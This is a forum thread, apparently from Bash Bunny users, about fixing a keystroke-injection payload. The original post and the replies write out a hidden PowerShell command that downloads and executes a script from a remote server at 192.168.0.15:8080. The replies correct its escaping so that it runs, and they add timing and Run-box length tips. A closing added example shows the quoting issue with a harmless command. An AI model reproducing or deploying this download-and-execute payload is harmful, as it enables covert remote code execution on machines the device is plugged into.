Problem With Custom Powershell Script?


bufferoverflow

Hey guys, so I'm trying to run a PowerShell script to call back to my listener. I have tried this on my Win7 VM and on Windows 10, and both times I get the same error.

The error I get is: the Bash Bunny starts, then on the computer it only brings up the Run window but doesn't copy the script and enter it. What's the problem?

Here is my payload.txt

ATTACKMODE HID
LED B
Q GUI r
Q DELAY 100
Q STRING powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $W.downloadstring('http://192.168.0.15:8080/Fs8jFMEC');
Q DELAY 500
Q ENTER
LED G

Thanks


Try using parentheses around the string.

E.g.

Q STRING "powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $W.downloadstring('http://192.168.0.15:8080/Fs8jFMEC');"


Let's clean that up even better so it works and doesn't substitute the "$"s with empty bash values.

Q STRING "powershell.exe -nop -w hidden -c \"\$W=new-object net.webclient;\$W.proxy=[Net.WebRequest]::GetSystemWebProxy();\$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX \$W.downloadstring('http://192.168.0.15:8080/Fs8jFMEC');\""

Think I mentioned this before when using BB to send the powershell command.

1) Encapsulate string parameter in quotes.

2) After doing this, all quotes, "$"s and backslashes (\) you want to send have to be escaped with "\".

3) Encapsulate the actual command string in escaped quotes so it is seen as one parameter argument in Windows.

The idea is to pass your powershell commands to powershell.exe as a string.

To really see what is coming out, have your payload launch notepad and type the executing string into it to see how it looks.

Also, it looks like you are trying to type this all out in the Run command instead of dropping to cmd first. The Run command has a limit on the number of characters that is much smaller than the command line's before it truncates your input. That may be happening too. You may have to put larger pauses/delays between your quack commands too. I always test with big time delays and then adjust accordingly to smaller times depending on responses.

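The quoting problem the replies above describe, as an added example that is not from the thread: payload.txt is a shell script, so the shell expands $W before QUACK types anything. A stand-in Q function records what would have been typed for the double-quoted form and for the escaped form, using a constructed, harmless PowerShell fragment in place of the thread's command.

```shell
#!/bin/sh
# Added example, not from the thread. A stand-in for the Bash Bunny Q command:
# the real one types its argument over HID; this one only records it.
TYPED=""
Q() {
    shift            # drop the STRING keyword, as the real Q would
    TYPED="$*"       # what the real Q would type on the target
}

# Double-quoted, as in the second reply: $W is unset in the shell, so it
# expands to nothing and the typed text loses every "$W".
typed_double_quoted() {
    Q STRING "powershell.exe -nop -c $W=Get-Date;$W.Year"
    printf '%s' "$TYPED"
}

# Escaped, as in the third reply: \$ keeps the literal $, and \" wraps the
# PowerShell code in quotes so Windows sees it as one -c argument.
typed_escaped() {
    Q STRING "powershell.exe -nop -c \"\$W=Get-Date;\$W.Year\""
    printf '%s' "$TYPED"
}

# Check that the escaped form still carries a "$W"; run this on any Linux
# shell (or the Bunny's own) before plugging the payload into a target.
check_quoting() {
    case "$(typed_escaped)" in
        *'$W'*) echo "escaped form keeps \$W"; return 0 ;;
        *)      echo "escaped form lost \$W";  return 1 ;;
    esac
}

echo "double-quoted: $(typed_double_quoted)"
echo "escaped:       $(typed_escaped)"
check_quoting
```

The first echo shows the text with "=Get-Date;.Year" where "$W" should be, which is exactly what the original poster's payload typed into the Run window.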
